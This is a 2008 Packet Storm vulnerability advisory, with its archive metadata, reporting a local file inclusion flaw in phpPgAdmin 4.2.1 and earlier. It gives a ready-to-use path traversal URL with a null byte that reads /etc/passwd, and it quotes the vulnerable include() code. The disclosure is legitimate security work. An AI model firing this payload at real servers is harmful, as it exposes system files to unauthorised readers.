ID PACKETSTORM:72700
Type packetstorm
Reporter dun
Modified 2008-12-09T00:00:00
Description
` :::::::-. ... ::::::. :::.
;;, `';, ;; ;;;`;;;;, `;;;
`[[ [[[[' [[[ [[[[[. '[[
$$, $$$$ $$$ $$$ "Y$c$$
888_,o8P'88 .d888 888 Y88
MMMMP"` "YmmMMMM"" MMM YM
[ Discovered by dun \ dun[at]strcpy.pl ]
##################################################################
# [ phpPgAdmin <= 4.2.1 ] Local File Inclusion Vulnerability #
##################################################################
#
# Script: "phpPgAdmin is a web-based administration tool for PostgreSQL. It is perfect for PostgreSQL DBAs, newbies and hosting services."
#
# Script site: http://www.phppgadmin.org/
# Download: http://phppgadmin.sourceforge.net/?page=download
#
# Vuln: http://site.com/phpPgAdmin/index.php?_language=../../../../../../../../etc/passwd%00
#
# Bug: ./phpPgAdmin-4.2.1/index.php (line: 11)
#
# ...
# include_once('./libraries/lib.inc.php');
# ...
#
#
# Bug: ./phpPgAdmin-4.2.1/libraries/lib.inc.php (lines: 22-138 -> 136)
#
# ...
# // Determine language file to import:
# // 1. Check for the language from a request var
# if (isset($_REQUEST['language']) && isset($appLangFiles[$_REQUEST['language']]))
# $_language = $_REQUEST['language'];
#
# // 2. Check for language session var
# if (!isset($_language) && isset($_SESSION['webdbLanguage']) && isset($appLangFiles[$_SESSION['webdbLanguage']])) {
# $_language = $_SESSION['webdbLanguage'];
# }
#
# // 3. Check for acceptable languages in HTTP_ACCEPT_LANGUAGE var
# if (!isset($_language) && $conf['default_lang'] == 'auto' && isset($_SERVER['HTTP_ACCEPT_LANGUAGE'])) {
# // extract acceptable language tags
# // (http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html#sec14.4)
# preg_match_all('/\s*([a-z]{1,8}(?:-[a-z]{1,8})*)(?:;q=([01](?:.[0-9]{0,3})?))?\s*(?:,|$)/', strtolower($_SERVER['HTTP_ACCEPT_LANGUAGE']), $_m, PREG_SET_ORDER);
# foreach($_m as $_l) { // $_l[1] = language tag, [2] = quality
# if (!isset($_l[2])) $_l[2] = 1; // Default quality to 1
# if ($_l[2] > 0 && $_l[2] <= 1 && isset($availableLanguages[$_l[1]])) {
# // Build up array of (quality => language_file)
# $_acceptLang[$_l[2]] = $availableLanguages[$_l[1]];
# }
# }
# unset($_m);
# unset($_l);
# if (isset($_acceptLang)) {
# // Sort acceptable languages by quality
# krsort($_acceptLang, SORT_NUMERIC);
# $_language = reset($_acceptLang);
# unset($_acceptLang);
# }
# }
#
# // 4. Otherwise resort to the default set in the config file
# if (!isset($_language) && $conf['default_lang'] != 'auto' && isset($appLangFiles[$conf['default_lang']])) {
# $_language = $conf['default_lang'];
# }
#
# // Import the language file
# if (isset($_language)) {
# include("./lang/recoded/{$_language}.php"); // * LFI *
# $_SESSION['webdbLanguage'] = $_language;
# }
# ...
#
#
###############################################
# Greetz: D3m0n_DE * str0ke * and otherz..
###############################################
[ dun / 2008 ]
*******************************************************************************************
`
{"type": "packetstorm", "published": "2008-12-09T00:00:00", "reporter": "dun", "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d4be9c4fc84262b4f39f89565918568f"}, {"key": "description", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "href", "hash": "2c8c22baa460388e102faf0edf3b27e1"}, {"key": "modified", "hash": "cffc4a21ec9864b1f88227b45e4fc885"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "cffc4a21ec9864b1f88227b45e4fc885"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "b89d9cbe507a01c3b78cba67642f2ba2"}, {"key": "sourceData", "hash": "a99f16944c25a1d95f9fd9390360e50c"}, {"key": "sourceHref", "hash": "476577e69189c7f5f4e6be7749552a6e"}, {"key": "title", "hash": "00ce124342df49962b7aa21ec4dcc175"}, {"key": "type", "hash": "6466ca3735f647eeaed965d9e71bd35d"}], "bulletinFamily": "exploit", "cvss": {"vector": "NONE", "score": 0.0}, "sourceData": "` :::::::-. ... ::::::. :::. \n;;, `';, ;; ;;;`;;;;, `;;; \n`[[ [[[[' [[[ [[[[[. '[[ \n$$, $$$$ $$$ $$$ \"Y$c$$ \n888_,o8P'88 .d888 888 Y88 \nMMMMP\"` \"YmmMMMM\"\" MMM YM \n \n[ Discovered by dun \\ dun[at]strcpy.pl ] \n \n################################################################## \n# [ phpPgAdmin <= 4.2.1 ] Local File Inclusion Vulnerability # \n################################################################## \n# \n# Script: \"phpPgAdmin is a web-based administration tool for PostgreSQL. It is perfect for PostgreSQL DBAs, newbies and hosting services.\" \n# \n# Script site: http://www.phppgadmin.org/ \n# Download: http://phppgadmin.sourceforge.net/?page=download \n# \n# Vuln: http://site.com/phpPgAdmin/index.php?_language=../../../../../../../../etc/passwd%00 \n# \n# Bug: ./phpPgAdmin-4.2.1/index.php (line: 11) \n# \n# ... \n# include_once('./libraries/lib.inc.php'); \n# ... \n# \n# \n# Bug: ./phpPgAdmin-4.2.1/libraries/lib.inc.php (lines: 22-138 -> 136) \n# \n# ... \n# // Determine language file to import: \n# // 1. Check for the language from a request var \n# if (isset($_REQUEST['language']) && isset($appLangFiles[$_REQUEST['language']])) \n# $_language = $_REQUEST['language']; \n# \n# // 2. Check for language session var \n# if (!isset($_language) && isset($_SESSION['webdbLanguage']) && isset($appLangFiles[$_SESSION['webdbLanguage']])) { \n# $_language = $_SESSION['webdbLanguage']; \n# } \n# \n# // 3. Check for acceptable languages in HTTP_ACCEPT_LANGUAGE var \n# if (!isset($_language) && $conf['default_lang'] == 'auto' && isset($_SERVER['HTTP_ACCEPT_LANGUAGE'])) { \n# // extract acceptable language tags \n# // (http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html#sec14.4) \n# preg_match_all('/\\s*([a-z]{1,8}(?:-[a-z]{1,8})*)(?:;q=([01](?:.[0-9]{0,3})?))?\\s*(?:,|$)/', strtolower($_SERVER['HTTP_ACCEPT_LANGUAGE']), $_m, PREG_SET_ORDER); \n# foreach($_m as $_l) { // $_l[1] = language tag, [2] = quality \n# if (!isset($_l[2])) $_l[2] = 1; // Default quality to 1 \n# if ($_l[2] > 0 && $_l[2] <= 1 && isset($availableLanguages[$_l[1]])) { \n# // Build up array of (quality => language_file) \n# $_acceptLang[$_l[2]] = $availableLanguages[$_l[1]]; \n# } \n# } \n# unset($_m); \n# unset($_l); \n# if (isset($_acceptLang)) { \n# // Sort acceptable languages by quality \n# krsort($_acceptLang, SORT_NUMERIC); \n# $_language = reset($_acceptLang); \n# unset($_acceptLang); \n# } \n# } \n# \n# // 4. Otherwise resort to the default set in the config file \n# if (!isset($_language) && $conf['default_lang'] != 'auto' && isset($appLangFiles[$conf['default_lang']])) { \n# $_language = $conf['default_lang']; \n# } \n# \n# // Import the language file \n# if (isset($_language)) { \n# include(\"./lang/recoded/{$_language}.php\"); // * LFI * \n# $_SESSION['webdbLanguage'] = $_language; \n# } \n# ... \n# \n# \n############################################### \n# Greetz: D3m0n_DE * str0ke * and otherz.. \n############################################### \n \n[ dun / 2008 ] \n \n******************************************************************************************* \n \n`\n", "viewCount": 1, "history": [], "lastseen": "2016-11-03T10:22:12", "objectVersion": "1.2", "href": "https://packetstormsecurity.com/files/72700/phpPgAdmin-4.2.1-Local-File-Inclusion.html", "sourceHref": "https://packetstormsecurity.com/files/download/72700/phppgadmin-lfi.txt", "title": "phpPgAdmin 4.2.1 Local File Inclusion", "enchantments": {"score": {"vector": "NONE", "value": 7.5}, "vulnersScore": 7.5}, "references": [], "id": "PACKETSTORM:72700", "hash": "7a1ec099d31f0ce9a466ed6f0cd9adc35083d9d7ba8646b9f5f86d5d90ba3a95", "edition": 1, "cvelist": [], "modified": "2008-12-09T00:00:00", "description": ""}
{}
